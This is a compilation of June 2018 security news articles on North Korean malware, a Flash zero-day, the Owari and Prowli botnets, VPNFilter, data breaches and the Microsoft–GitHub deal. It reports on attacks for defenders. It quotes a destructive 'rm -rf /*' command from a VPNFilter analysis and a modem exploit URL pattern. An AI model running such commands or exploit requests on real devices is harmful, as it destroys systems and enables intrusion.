According to the US-CERT alert, "fully functional RAT" Joanap is a two-stage malware that establishes peer-to-peer communications and manages botnets designed to enable other malicious operations.
The malware typically infects a system as a file delivered by other malware, which users unknowingly download either when they visit websites compromised by the Hidden Cobra actors, or when they open malicious email attachments.
Joanap receives commands from a remote command and control server controlled by the Hidden Cobra actors, giving them the ability to steal data, install and run more malware, and initialize proxy communications on a compromised Windows device.
Other functionalities of Joanap include file management, process management, creation and deletion of directories, botnet management, and node management.
During analysis of the Joanap infrastructure, the U.S. government has found the malware on 87 compromised network nodes in 17 countries including Brazil, China, Spain, Taiwan, Sweden, India, and Iran.
Brambul—An SMB Worm
Brambul is a brute-force authentication worm that like the devastating WannaCry ransomware, abuses the Server Message Block (SMB) protocol in order to spread itself to other systems.
The malicious Windows 32-bit SMB worm functions as a service dynamic link library file or a portable executable file often dropped and installed onto victims' networks by dropper malware.
"When executed, the malware attempts to establish contact with victim systems and IP addresses on victims' local subnets," the alert notes.
"If successful, the application attempts to gain unauthorized access via the SMB protocol (ports 139 and 445) by launching brute-force password attacks using a list of embedded passwords. Additionally, the malware generates random IP addresses for further attacks."
Once Brambul gains unauthorized access to the infected system, the malware communicates information about victim's systems to the Hidden Cobra hackers using email. The information includes the IP address and hostname—as well as the username and password—of each victim's system.
The hackers can then use this stolen information to remotely access the compromised system via the SMB protocol. The actors can even generate and execute what analysts call a "suicide script."
DHS and FBI have also provided downloadable lists of IP addresses with which the Hidden Cobra malware communicates and other IOCs, to help you block them and enable network defenses to reduce exposure to any malicious cyber activity by the North Korean government.
DHS also recommended users and administrators to use best practices as preventive measures to protect their computer networks, like keeping their software and system up to date, running Antivirus software, turning off SMB, forbidding unknown executables and software applications.
Last year, the DHS and the FBI published an alert describing Hidden Cobra malware, called Delta Charlie—a DDoS tool which they believed North Korea uses to launch distributed denial-of-service (DDoS) attacks against its targets.
Other malware linked to Hidden Cobra in the past include Destover, Wild Positron or Duuzer, and Hangman with sophisticated capabilities, like DDoS botnets, keyloggers, remote access tools (RATs), and wiper malware.

Adobe fixed the CVE-2018-5002 Flash Zero-Day exploited in targeted attacks in the Middle East

7.6.2018 securityaffairs Exploit

Adobe has recently fixed several vulnerabilities, including the CVE-2018-5002 Flash Zero-Day exploited in targeted attacks in the Middle East
Adobe has released security updates for Flash Player that address four vulnerabilities, including a critical issue (CVE-2018-5002) that has been exploited in targeted attacks mainly aimed at entities in the Middle East.

The CVE-2018-5002 vulnerability, reported by researchers at ICEBRG and Qihoo 360 and Tencent, is a stack-based buffer overflow that can be exploited by attackers arbitrary code execution.

“Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. These updates address critical vulnerabilities in Adobe Flash Player and earlier versions. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory published by Adobe.

“Adobe is aware of a report that an exploit for CVE-2018-5002 exists in the wild, and is being used in limited, targeted attacks against Windows users. These attacks leverage Office documents with embedded malicious Flash Player content distributed via email.”

The researcher did not disclose technical details of the vulnerability, but Adobe confirmed that the zero-day was exploited in targeted attacks against Windows users.

Attackers launched spear phishing attacks using messages with weaponized Office documents (Excel spreadsheet named “salary.xlsx) that contain specially crafted Flash content.

“The hackers carefully constructed an Office document that remotely loaded Flash vulnerability. When the document was opened, all the exploit code and malicious payload were delivered through remote servers. This attack mainly targets the Middle East.” reads the analysis published by Qihoo 360.

CVE-2018-5002 zero-day Adobe Flash player

The Flash Player version also addresses the following vulnerabilities:

CVE-2018-4945 – a critical type confusion vulnerability that can lead to code execution, it was reported by researchers at Tencent.
CVE-2018-5000 – an “important” severity integer overflow that can lead to information disclosure, it was reported anonymously through Trend Micro’s Zero Day Initiative (ZDI).
CVE-2018-5001 – an “important” out-of-bounds read flaw that can lead to information disclosure, it was reported anonymously through Trend Micro’s Zero Day Initiative (ZDI).
This is the second zero-day discovered in 2018, the first Adobe zero-day, tracked as CVE-2018-4878, was patched in February after it was exploited by North Korea-linked nation-state hackers in attacks aimed at South Korea. The flaw was later exploited by different cybercrime gangs.

According to the analysis published by Qihoo 360, attackers were preparing the campaign recently detected at least since February. The C&C domain appears as a job search website in the Middle East and its name leads the experts into believing that the target is located in Doha, Qatar.

“Through analysis, we can see that the attack used a 0-day vulnerability regardless of the cost. The attacker developed sophisticated plans in the cloud and spent at least three months preparing for the attack. The detailed phishing attack content was also tailored to the attack target. All clues show this is a typical APT attack. We suggest all relevant organizations and users to update their Flash to the latest versions in a timely manner. ” concludes Qihoo 360.

It’s not a joke, Owari botnet operators used root as username and password to access a C&C
7.6.2018 securityaffairs BotNet

Security expert Ankit Anubhav discovered a Command and Control server for the Owari botnet protected with weak credentials.
An IoT botnet has been commandeered by white hats after its controllers used a weak username and password combination for its command-and-control server.

Security expert Ankit Anubhav from Newsky Security discovered an IoT botnet that was controlled by an architecture poorly configured, the botmaster used weak credentials for the authentication to the command-and-control server.

The researchers exploited week configuration to take over the MySQL server used to control the Owari botnet, the author left port 3306 open allowing the authentication with “root” as username and password.

“We observed few IPs attacking our honeypots with default credentials, with executing commands like /bin/busybox OWARI post successful login. In one of the cases, a payload hosted on 80(.)211(.)232(.)43 was attempted to be run post download.

When we investigated the IP, we observed that port 3306, the default port for MySQL database, was open.” reads the blog post published by Ankit Anubhav.

“We tried to investigate more into this IP. To our surprise, it is connected to the attacker’s servers using one of the weakest credentials known to mankind.

Username: root
Password: root“

The situation is paradoxical considering that Mirai-based botnets, including Owari, spread through Internet-of-Things devices by brute-force guessing passwords and taking advantage of default credentials.

Database investigation conducted by the experts allowed the expert to discover a User table that contains login credentials for various users who will control the botnet. Some entries could be associated with botmasters or customers of the botnet

“User table contains login credentials for various users who will control the botnet. Some of them can be botnet creators, or some can simply be the customers of the botnet, a.k.a black box users, who pay a sum of money to launch DDoS attacks. Besides credentials, duration limit such as for how much time the user can perform the DDoS, maximum available bots for attack (-1 means the entire botnet army of the bot master is available) and cooldown time (time interval between the two attack commands) can also be observed.” continues the expert.

“In the specific Owari case, we observe one user with duration limit of 3600 seconds with permissible bot usage set as -1(maximum). It is to be noted that the credentials of all these botnet users are also weak.”

The expert also discovered a history table containing information on the DDoS attacks carried out against various targets. Some of the IP addresses targeted by the botnet were associated with rival IoT botnets.

Anubhav also investigated the revenue model behind the Owari botnet, he was able to reach a known Owari operator that goes online as “Scarface” that provided the following comment:

“For 60$ / month, I usually offer around 600 seconds of boot time, which is low compared to what other people offer. However, it is the only way I can guarantee a stable bot count.” explained Scarface.

“I can’t allow having 10+ people doing concurrent attacks of 1800 seconds each. Usually there is no cooldown on my spots. If I decide to give the cooldown, it’s about 60 seconds or less. 60$/month is not much but when you get 10–15 costumers per month it is enough to cover most of my virtual expenses”

Is this the end for the Owari botnet?

Of course no, even if the expert has taken over the MySQL database, botnet operators continuously change attack IPs to remain under the radar even when the malicious traffic associated to some of their IPs is detected.

The IPs reported in the analysis of the expert are already offline.

Are Wi-Fi hotspots in World Cup Russia host cities secure?

7.6.2018 securityaffairs CyberCrime

Experts at Kaspersky Lab have evaluated the security of 32,000 public Wi-Fi hotspots in the 11 Russian cities hosting the World Cup.
The upcoming soccer World Cup represents a privileged target for crooks, hackers, and nation-state actors. It is essential for organizations to take care of any aspect related to the event to protect participants, including travelers using WiFi networks in the host cities.

Experts at Kaspersky Lab have evaluated the security of 32,000 public Wi-Fi hotspots in the 11 Russian cities hosting the World Cup. We have explained several times, the risks associated with the usage of open WiFi networks, threat actors could monitor traffic to steal sensitive data and launch MITM attacks against the victims to conduct a broad range of malicious activities.

“A lack of essential traffic encryption for Wi-Fi networks where official and global activities are taking place – such as at locations around the forthcoming FIFA World Cup 2018 – offers especially fertile ground for criminals.” reads the report published by Kaspersky.

“Over a fifth (22.4%) of Wi-Fi hotspots in FIFA World Cup 2018 host cities use unreliable networks. This means that criminals simply need to be located near an access point to grab the traffic and get their hands on user data.”

The study involved volunteers who agreed to travel around the host cities searching for public Wi-Fi hotspots. The experts discovered that around 62.4 percent of hotspots are secured via WPA2 encryption, while another 13.5 percent use another, unknown encryption method.

Of course, the level of protection for the secured networks depends on the security settings, such as the strength of the password used to access the hotspot.

Wi-Fi Russia World Cup

The study revealed that the number of secured networks varies from city to city, the researchers evaluated hotspots in 11 host cities.

Saransk was the most secure city with 72 percent of access points using WPA/WPA2, the cities of Samara and Nizhny Novogorod follow with respectively 67 and 66 percent.

Black flag for St. Petersburg, the least secure host city with just 50 percent of hotspots using WPA2 and 37 percent of access points completely unsecured.

It is important to highlight that even WPA2 protection should be considered totally secure.

“Even a WPA2 connection in a cafe couldn’t be considered as secure, if the password is visible to everyone. Nevertheless, we believe that the methodology used represents the Wi-Fi hotspot security situation in the host cities, with a fair degree of accuracy.” states Kaspersky Lab.

“The results of this research show that the security of Wi-Fi connections in FIFA World Cup hosts cities varies. Therefore. We therefore recommend that users follow some key safety rules.”

Kaspersky recommends also provided best practices such as using a trusted VPN while traveling, below the complete list:

Whenever possible, connect via a Virtual Private Network (VPN). With a VPN, encrypted traffic is transmitted over a protected tunnel, meaning that criminals won’t be able to read your data, even if they gain access to it. For example, the Kaspersky Secure Connection VPN solution can switch on automatically when a connection is not safe.
Do not trust networks that are not password-protected, or have easy-to-guess or easy-to-find passwords.
Even if a network requests a strong password, you should remain vigilant. Fraudsters can find out the network password at a coffee shop, for example, and then create a fake connection using the same password. This allows them to easily steal personal user data. You should only trust network names and passwords given to you by the employees of an establishment.
To maximize your protection, turn off your Wi-Fi connection whenever you are not using it. This will also save your battery life. We recommend you also disable automatic connections to existing Wi-Fi networks.
If you are not 100% sure that the wireless network you are using is secure, but you still need to connect to the Internet, try to limit yourself to basic user actions such as searching for information. You should refrain from entering your login details for social networks or mail services, and definitely do not perform any online banking operations or enter your bank card details anywhere. This will avoid situations where your sensitive data or passwords are intercepted and then used for malicious purposes later on.
To avoid becoming a cybercriminal target, you should enable the “Always use a secure connection” (HTTPS) option in your device settings. Enabling this option is recommended when visiting any websites you think may lack the necessary protection.

How Threat Hunters Operate in Modern Security Environments
7.6.2018 securityaffairs Cyber

Cyber security – With millions of new malware surfacing on the internet every year, threat hunters need to be ever more ready and at the top of their game to ensure that their organization can remain safe and protected from all cyber threats.
Cyber security is a universe in its own. It’s got its own unique domains, and its fair share of challenges and that are faced every day by cyber security experts. Of late, a new terminology has surfaced on the internet; threat hunter. The role of a cyber-security hunter is becomingly rapidly and crucially important with each passing day.

cyber security

In 2017, the number of cyber-attacks that took place just across the US was almost 50% higher compared to the previous year. And this year is no different. According to a recent survey conducted by Crowd Research Partners, “the number of threats in the cyber space have continued to double each year“.

While millions of businesses are facing threats from cyber criminals, the wise ones are busy recruiting, training, and equipping their cyber security threat hunters with sophisticated tools and equipment required to fight the online malice.

Naturally, the ones who are uncertain about what a cyber-security threat hunter is supposed to do, are looking for avenues to get their hands on the skill. This article will help you get a basic understanding related to most aspects of threat hunters and how they work in modern security environments.

Job Description, Skills and Qualifications of a Threat Hunter
A Network threat hunter starts his research by assuming that the network has already been breached. This assumption is based on the fact that even though tools such as VPNs (recommended ones are PureVPN, PIA & Ivacy) and other server protections are in place, a breach has been made into the network which was sophisticated enough to bypass the VPN and other security measures.

A threat hunter needs to have a proactive approach while scanning all the networks and servers for possible breaches or intrusions. He also needs to be very creative in terms of understanding anomalies and slightly abnormal happenings or instances going on over a network.

When it comes to technical knowledge, threat hunters need to be at the top of their game in this forte. Only, when they understand the depths of how a network functions and how data flows through it, can they spot issues such as data being leaked or worse, getting hijacked by someone else.

Lastly, a network threat hunter needs to know the SOPs that are prescribed by the organization he is working at, along with the SOPs of the cyber security industry. Only when he knows in totally about the culture which is expected to be religiously followed, will he be able to create exceptions and detect threats which no eyes have ever seen before.

Understanding Dynamics of Modern Security Environments
Threats that the modern security environments face are evolving every day. It will be only logical to state that the tools and procedures in use today will soon become obsolete and get replaces with new tools and tech. Consequently, organizations that are concerned about keeping their networks and digital environments secure, need to be on the constant move toward adopting new tools and techniques.

This may not guarantee ultimate safety, but will definitely play a crucial role in keeping the organizations at least at par, if not a step ahead, with the growing threats in the online space.

How Threat Hunters Operate In Modern Security Environments?
In 2016, it was reported by G Data Software that 6.8 million new malware specimen surfaced on the internet. A year later, this number rose to 7.1 million. Looking at this trend, it is very clear that the coming years are going to be no easier on the threat hunters. In fact, it emphasizes on the importance of training threat hunters and preparing them for the most unexpected.

Of the 7.1 million new strains of malware that were discovered in 2017, obviously not all of them would be dangerous. However, identifying the few dangerous ones is what determines if a digital environment is secure or not. This is where threat hunters contribute for keeping the networks secure.

A threat hunter identifies threats which AI systems may have missed. They do so by focusing on the shortcomings of their organizational security architectures, which fail at preventing threats from gaining entry into the digital environment.

How to Conduct a Threat Hunt
Outsource or DIY
The first step to efficiently conduct an organization-wide threat hunt is to determine if it could to be carried out by the in-house security team. For such a case, it is important to allocate dedicated resources and equipment to the threat hunters.

If, for any reasons, the in-house team lacks the acumen for such a task, or if there are resource or time constraints that the security team is occupied with, the safer option is to outsource it.

Focus on Key Areas and Make a Plan
It is crucial to treat threat hunting as a pre-planned process, and not as an ad hoc task. Creating a proper plan and defining procedures that should be followed throughout the threat hunting process will play a crucial role in making the efforts bring a positive impact.

With a plan and a schedule in place, it could be made sure that tasks of the threat hunting team do not interfere with those of other teams. Furthermore, the schedule can also help in pre-determining the order of tasks that are to be executed. This will allow threat hunters to operate smoothly and effectively, while keeping track of all the tasks that have been accomplished and the ones that need attention.

Produce a Hypothesis
Beginning with the end in mind makes it easy to plot your journey and now for sure when a task is completed. When hunting threats, the team should determine what it is looking for and what it wants to find. For example, in this case, the threat hunters should determine beforehand that they are looking for malwares, or intruders who may have hacked the system.

Knowing what exactly to look for makes it easy to find it if it is there, or know when to stop the search in case there are no threats. If a hypothesis is not present, the search for threats may become endless and threat hunters will never be certain about when to stop.

Gather Crucial Information and Data
There is a lot to do when it comes to organizing all the available information and data. If the data is not organized, it is useless, as it becomes almost impossible to find what’s needed at the right moment. The data that threat hunters will collect and organize can include process names, command line files, DNS queries, destination IP addresses, digital signatures, etc.

If all this information is available but not sorted in a manner which is easy to sift through, threat hunters may take a lot of time for just finding the right information, and then additional time for utilizing the data for their processes. Such an approach can inflate budgets and resources used in threat hunting, damaging the overall productivity of the threat hunting team.

Task Automation
Without taking help of AI and automating tasks, it would be impossible to keep up with the ever-growing cyber threats. Even though a human eye is very much needed, without automation, the thousands of new threats and malware that surface on the internet every day, will go unnoticed.

For threat hunters, a combination of human resource which is exceptionally good at what they do is needed with artificial intelligence that has been built for precisely finding threats to modern security environments and sensitive networks.

That being said, there is no such thing as a perfect tool or a perfect procedure that a threat hunter can follow to eliminate threats from a modern security environment. It’s always a continues to struggle between competing with the online threats that keep getting better each day, and the innovation required by threat hunters to always stay one step ahead from the cyber-attacks.

AI and the Future of Cyber Threat Hunting
One of the most evolving tools in the recent times is artificial intelligence and machine learning, which has been helping threat hunters to reduce the amount of time they are spending on detention, prevention and fixing the issues. It also helps to improve the efficiency of the measures that the threat hunters take.
However, some people believe that as AI gets better, it will replace the need for having human threat hunters. We believe that will never be the case. This is due to two reasons.

Primarily, AI is a developing technology, which is available to both sides, the good and the evil. Moreover, some analysts even suggest that future cyber threats will be created and propagated using AI and even blockchain for creating a much wider impact.

Secondly, AI is a tool created by humans. Even though it is very efficient in terms of analyzing all options at the same time and taking the best decision, it may never be able to outpace the creativity and innovation that the human mind is capable of. AI may come in very handy for implementation and research purposes, but for now, the humans will lead the show with their own creativity and critical thinking.

Prowli Operation – Crooks already compromised over 40,000 servers and IoT Devices
7.6.2018 securityaffairs IoT

Crooks have infected over 40,000 web servers, modems, and other IoT devices with the Prowli malware as part of a cryptocurrency mining campaign and to redirect victims to malicious sites.
The Prowli malware was spotted by researchers at GuardiCore, attackers composed the huge botnet by exploiting known vulnerabilities and brute-force attacks.

This campaign, dubbed Operation Prowli, aimed at servers and devices using the following arrack methods, including:

Using a self-propagating worm that targets systems running SSH by brute force credential guessing, then the infected machines download and run a cryptocurrency miner.
Exploiting the CVE-2018-7482 file download vulnerability to compromise Joomla! Servers running the K2 extension
Accessing the internet facing configuration panel of variety of DSL modems by using a URL such as http://:7547/UD/act?1 and passing in parameters exploiting a known vulnerability. The vulnerability affects the processing of SOAP data and allows remote code execution. This vulnerability was previously used by the Mirai worm.
Using several exploits and launching brute-force attacks o admin panel of WordPress sites.
Exploiting a 4-year-old vulnerability, CVE-2014-2623, to execute commands with system privileges on servers running HP Data Protector exposed to the internet (over port 5555).
Targeting Drupal, PhpMyAdmin installations, NFS boxes, and servers with exposed SMB ports via brute-force credentials guessing.
prowli op

Once attackers have compromised a server or an IoT device, they determine if they can use it for cryptocurrency mining operations. Hackers used a Monero miner and the r2r2 worm, a piece of malware used to launch SSH brute-force attacks from the hacked devices.

“The attackers behind Prowli incur no expenses when they use r2r2 to take over computers owned by others and use mining pools to launder their gains. Cryptocurrency is a common payload of modern worms, and in this case as in many others, our attackers prefer to mine Monero, a cryptocurrency focused on privacy and anonymity to a greater degree than Bitcoin.” reads the analysis published by the experts.

“Second source of revenue is traffic monetization fraud. Traffic monetizers, such as roi777, buy traffic from “website operators” such as the Prowli attackers and redirect it to domains on demand. Website “operators” earn money per traffic sent through roi777. The destination domains frequently host different scams, such as fake services, malicious browser extensions and more.”

The hackers also compromised servers with the WSO Web Shell backdoor. Hacked websites were used to host malicious code that redirects visitors to a traffic distribution system (TDS), with such kind of attack scheme crooks monetize their efforts by selling hijacked traffic.

“Traffic monetizers, such as roi777, buy traffic from “website operators” such as the Prowli attackers and redirect it to domains on demand. Website “operators” earn money per traffic sent through roi777. The destination domains frequently host different scams, such as fake services, malicious browser extensions and more.” continues the experts.

Further details on the Prowli campaign, including IoCs are reported in the analysis published by GuardiCore.

VPNFilter malware now targets new devices, even behind a firewall
7.6.2018 securityaffairs 

The VPNFilter botnet now targeting new devices from other vendors, including ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE.
The VPNFilter botnet is worse than initially thought, according to a new report published by Cisco Talos Intelligence group, the malicious code is now targeting ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE

“First, we have determined that additional devices are being targeted by this actor, including some from vendors that are new to the target list. These new vendors are ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE.” reads a new analysis published by Talos team.

“New devices were also discovered from Linksys, MikroTik, Netgear, and TP-Link. Our research currently shows that no Cisco network devices are affected.”

VPNFilter bot is now able to target endpoints behind the firewall and other network devices using a new stage 3 module that injects malicious content into web traffic

The recently discovered module dubbed “ssler” could be exploited by attackers to deliver exploits to endpoints via a man-in-the-middle capability (e.g. they can intercept network traffic and inject malicious code into it without the user’s knowledge).

“The ssler module, which we pronounce as “Esler,” provides data exfiltration and JavaScript injection capabilities by intercepting all traffic passing through the device destined for port 80. This module is expected to be executed with a parameter list, which determines the module’s behavior and which websites should be targeted.” continues the analysis.

VPNFilter initially infected over 500,000 routers and NAS devices, most of them in Ukraine, but fortunately, a prompt action of authorities allowed to take down it.

A week ago, experts from security firms GreyNoise Intelligence and JASK announced that the threat actor behind the VPNFilter is now attempting to resume the botnet with a new wave of infections.

Talos researchers confirmed that more devices from Linksys, MikroTik, Netgear, and TP-Link are affected, this means that the botnet could rapidly grow to infect new consumer or SOHO devices.

Talos already notified the attacks to the vendors, most of them promptly started working on new firmware to address the issue.

VPNFilter malware

According to experts at Juniper Networks, the VPNFilter bot doesn’t exploit a zero-day vulnerability.

“The initial list of targeted routers included MicroTik, Linksys, NetGear, and TPLink. It is now expanded to include devices from ASUS, D-Link, Huawei, Ubiquiti, UPVEL and ZTE.” reads a post published by Juniper Network.

“We still do not believe this list is complete as more infected devices are being discovered. There is still no sign of any zero day vulnerability being exploited, so it is likely that known vulnerabilities and weak passwords are the main vector of infection.”

The new attacks observed by Talos leverage compromised SOHO routers to inject content into web traffic using the ssler module.

The experts noticed that one of the parameters provided to the module it the source IP, a circumstance that suggests attackers might be profiling endpoints to pick out the best targets. The module is also able to monitor destination IP, likely to choose profitable targets, such as connection to a bank, or connections on which are credentials and other sensitive data are in transit.

The experts also provided further details on the device destruction module ‘dstr’ that attackers could use to render an infected device inoperable.

The dstr module is able to delete files necessary for normal operation of the infected device, it also deletes all files and folders related to its own operation to hide its presence to a forensic analysis.

“The dstr module clears flash memory by overwriting the bytes of all available /dev/mtdX devices with a 0xFF byte. Finally, the shell command rm -rf /* is executed to delete the remainder of the file system and the device is rebooted. At this point, the device will not have any of the files it needs to operate and fail to boot.” continues the analysis.

The following table published by El Reg shows all devices targeted by the VPNFilter bot, new ones are marked with an asterisk.

ASUS RT-AC66U*; RT-N10 series*, RT-N56 series*
D-Link DES-1210-08P*; DIR-300 Series*; DSR-250, 500, and 1000 series*
Huawei HG8245*
Linksys E1200; E1500; E3000*; E3200*; E4200*; RV082*; WRVS4400N
Microtik CCR1009*; CCR1x series; CRS series*; RB series*; STX5*
Netgear DG834*; DGN series*; FVS318N*; MBRN3000*; R-series; WNR series*; WND series*; UTM50*
QNAP TS251; TS439 Pro; other devices running QTS software
TP-Link R600VPN; TL-WR series*
Ubiquiti NSM2*; PBE M5*
UPVEL Unknown devices
Further technical details are available in the report published by Talos.

HR Software Firm PageUp Suffers Data Breach
6.6.2018 securityweek Incindent

PageUp, an Australian company that provides HR software, informed customers this week that it launched an investigation on May 23 after detecting suspicious activity on its IT infrastructure.

The firm’s analysis of the incident revealed on May 28 that hackers may have gained access to names, contact information, usernames, and password hashes. Documents, such as signed employment contracts and resumes, should be safe as they are stored on different servers.

“There is no evidence that there is still an active threat, and the jobs website can continue to be used. All client user and candidate passwords in our database are hashed using bcrypt and salted, however, out of an abundance of caution, we suggest users change their password,” said Karen Cariss, CEO and co-founder of PageUp.

While the company has only shared limited technical information regarding the incident, it did say that the attack involved a piece of malware. The breach has been investigated by both law enforcement and cybersecurity experts. Cybersecurity organizations and data regulators in Australia and the United Kingdom have been notified.

PageUp says it has 2.6 million active users across over 190 countries. Some of the company’s customers have notified job applicants and shut down their online recruitment pages following the incident.

Australia Post, which has been using PageUp since October 2016, highlighted that in the case of individuals whose applications were successful, bank details, tax file numbers and other sensitive information was also stored on PageUp servers. There is no evidence, however, that this data has been accessed by hackers, Australia Post said.

Wesfarmers-owned supermarket chain Coles has shut down its careers website and issued a statement saying it has suspended all connections between its systems and PageUp while an investigation is conducted. Other Wesfarmers retailers, including Kmart, Target and Officeworks, have also shut down their careers websites.

Australian telecoms giant Telstra has also suspended its online recruitment system due to the breach at PageUp. The company warned successful applicants that their date of birth, employment offer details, and pre-employment check outcomes were stored on PageUp systems.

The incident also impacts logistics and supply chain company Linfox and private health insurer Medibank, both of which have suspended their careers pages.

Several universities in the United States also use PageUp. However, at the time of writing, none of the U.S. universities listed on PageUp’s testimonials page have issued security alerts or suspended their online recruitment systems.

Thousands of Organizations Expose Sensitive Data via Google Groups
6.6.2018 securityweek Incindent

Google has issued a warning to G Suite users after researchers discovered that thousands of organizations expose sensitive information through misconfigured Google Groups instances.

The Google Groups service allows users to create mailing lists, host internal discussions, and process support tickets. These types of communications can include highly sensitive information, which is why it’s important for companies to ensure that privacy and security settings are configured properly.

When a group is configured, its creator has to set sharing options for “Outside this domain - access to groups” to either “Private” or “Public on the Internet.” While the default option is “Private,” many organizations have set it to “Public on the Internet,” in many cases likely not realizing that anyone can access the group.

Data exposed through misconfigured Google Groups

Researchers at Kenna Security have conducted an analysis of roughly 2.5 million domains and identified more than 9,600 organizations that had allowed public access to their groups. After taking a closer look at a random sample of 171 groups, the company estimated that nearly 3,000 of the over 9,600 companies leaked some type of sensitive information.

The impacted organizations include Fortune 500 companies, universities, hospitals, media firms, financial institutions, and even government agencies.

The exposed information includes financial data, passwords, and documents containing confidential information.

“Given the sensitive nature of this information, possible implications include spear-phishing, account takeover, and a wide variety of case-specific fraud and abuse,” Kenna Security said in a blog post.

The company notified some of the organizations leaking highly sensitive data and pointed out that the “views” counter was in a vast majority of cases at zero, which indicates that no one had seen the information.

Kenna has also notified Google, but since this is not an actual vulnerability, the issue cannot be addressed with a patch. The tech giant did say, however, that it’s always reviewing its products to “help users make decisions that are appropriate for their organizations.”

Google has also published a post on its G Suite blog, providing advice on how users can configure their Google Groups settings to better protect their data.

This is not the first time researchers have warned about the risks associated with misconfigured Google Groups instances. Last year, cloud security firm RedLock warned that hundreds of organizations were likely exposing sensitive data through Google Groups. At the time, the company found names, email and home addresses, employee salary data, sales pipeline data, and customer passwords in the exposed groups.

VPNFilter Continues Targeting Routers in Ukraine
6.6.2018 securityweek

Despite their infrastructure being disrupted, the hackers behind the VPNFilter botnet continue targeting routers located in Ukraine, which is believed to be the campaign’s primary target.

When Cisco Talos brought the existence of VPNFilter to light last month, the botnet had ensnared at least 500,000 routers and network-attached storage (NAS) devices across 54 countries.

The malware can intercept data passing through the compromised device, it can monitor the network for communications over the Modbus SCADA protocol, and also has destructive capabilities that can be leveraged to make an infected device unusable.

During the first stage of the infection process, once it completed initialization, the malware attempted to obtain an IP address from images hosted on the Photobucket service. If that failed, it would try to acquire the IP from an image hosted on a backup domain, toknowall.com. That IP pointed to a server hosting the stage 2 payload.

Photobucket has closed the accounts used in the attack and the FBI has managed to take control of the toknowall.com domain, thus disrupting the operation.

However, VPNFilter is designed to open a listener and wait for a specific trigger packet if the backup domain fails as well. This allows the attacker to still provide the IP for the stage 2 component.

While it’s unclear exactly what else the FBI and cybersecurity firms did to disrupt the botnet, researchers at Jask and GreyNoise Intelligence noticed that VPNFilter has continued to target routers even after Talos published its report and the toknowall.com domain was seized.

Experts have observed some IPs scanning port 2000 for vulnerable MikroTik routers located exclusively in Ukraine. The source IPs have been traced to countries such as Russia, Brazil, the United States, and Switzerland.

“Activity like this raises some interesting questions about indications of ongoing Ukraine targeted campaigns, a likely subject for future research,” Jask wrote in a blog post.

The VPNFilter attack was allegedly launched by Russia – specifically the group known as Sofacy, APT28, Pawn Storm, Fancy Bear, and Sednit – and the main target is believed to be Ukraine. Some links have also been found between the VPNFilter malware and BlackEnergy, which has been used by a different Russia-linked threat actor known as Sandworm. The FBI has viewed Sofacy and Sandworm as the same group when it attributed VPNFilter to Russia.

The VPNFilter malware has been observed targeting devices from Linksys, MikroTik, Netgear, TP-Link and QNAP. All of these vendors have published advisories to warn their customers about the threat.

The FBI has advised users to reboot their routers to temporarily disrupt the malware. While rebooting a router is typically enough to remove a piece of malware, VPNFilter has a clever persistence mechanism that helps its stage 1 component survive a reboot of the device.

Microsoft to Acquire GitHub for $7.5 Billion
6.6.2018 securityweek IT

Microsoft on Monday announced that it has agreed to acquire software development and collaborateion platform GitHub in a deal valued at $7.5 billion.

Under the terms of the agreement, Microsoft will acquire GitHub for $7.5 billion in Microsoft stock. The dal is expected to close by the end of 2018, subject to customary closing conditions and regulatory review.

GitHub is a cloud-based repository for source code, offering hosting, version control management and code collaboration capabilities. It is thought to have 27 million developers using its services in nearly every country in the world, and to host 80 million code repositories. Microsoft is already a major user of GitHub, reportedly with more than 1,000 employees pushing code to GitHub repositories.

GitHub was valued at $2 billion dollars at its most recent funding round in 2015.

The acquisition makes sense for Microsoft with its increasing involvement with Linux and open source projects. There is, however, concern among many of the independent developers using the service, pointing to a perceived performance reduction from both LinkedIn and Skype following earlier acquisition by Microsoft.

"LinkedIn has turned into a slow-loading junk after the Microsoft acquisition. I can only imagine what awaits GitHub," tweeted Catalin Cimpanu.

A further concern is that ownership could give Microsoft access to the source of potentially competitive or disruptive projects. "This is not all about Microsoft," was another tweet. "This is about the independence of what has become the de-facto home of open source. It shouldn't be owned by any company that has any agenda other than host that home."

Robert Graham of Errata Security has a different concern. GitHub has a history of national censorship attempts -- a DDoS out of Russia in 2014; blocked in India in 2014; a DDoS apparently out of China in 2015; and blocked in Turkey in 2016. On February 28, 2018, GitHub was hit by a world record DDoS peaking at 1.35 Tbps.

His concern now is that China would be able to censor GitHub via Microsoft. It cannot currently censor individual pages (such as those about the Tiananmen Square massacre in 1989) because GitHub forces the use of SSL/TLS, so the China Firewall cannot see which pages are being accessed. "The only option," he tweeted "would be to block the entire site, all access to http://GitHub.com, but China can't do that either, because so much source code is hosted on GitHub -- source code their industry needs in order to build products."

As an independent organization he believes that GitHub is too important to be blocked by the Chinese government. "When Microsoft buys GitHub, however, China will now have leverage, threatening other Microsoft interests in China in order to pressure Microsoft into censoring some GitHub pages."

In the meantime, with few details of the terms and conditions, users' reactions have been largely emotional. There was widespread concern that Microsoft's motive in buying LinkedIn was to gain access to the personal details of the world's business management. There is similar concern now that Microsoft is seeking to gain some form of control over the world's open source software.

This is unlikely. SecurityWeek spoke to Robin Wood (aka DigiNinja), an independent penetration tester who uses GitHub to host the tools he develops for his trade. Assuming the purchase is finalized, "I think the important thing to look at is the exact details of the terms and conditions and any changes they decide to make to it," he told SecurityWeek. "There may be clauses in there about ownership or use without license that currently don't mean much but could mean a lot with the change of ownership."

For the moment, he is not worried by the takeover. "There are a number of established alternatives, so they can't do much to mess up actual usage otherwise people will just move away. So probably no real change for most users of the service but some with tools that Microsoft are interested in may be hit."

For himself and his own repositories, "I won't be moving my tools unless there are any specific negative changes that affect me, but I reckon there will be a bunch of people jumping ship early just in case, and another bunch fear-mongering about all the nasty stuff that might happen, most of it just guess work."

Microsoft Corporate Vice President Nat Friedman, founder of Xamarin and an open source veteran, will assume the role of GitHub CEO. GitHub’s current CEO, Chris Wanstrath, will become a Microsoft technical fellow, reporting to Executive Vice President Scott Guthrie, to work on strategic software initiatives, Microsoft said.

Google Password Protects Pixel 2 Firmware
6.6.2018 securityweek Safety

Google has made the firmware of Pixel 2 devices resistant to unauthorized attempts to upgrade it by password protecting it.

Specifically, anyone interested in upgrading the firmware of a Pixel 2 device needs to supply the user password to successfully complete the process and still have access to user data.

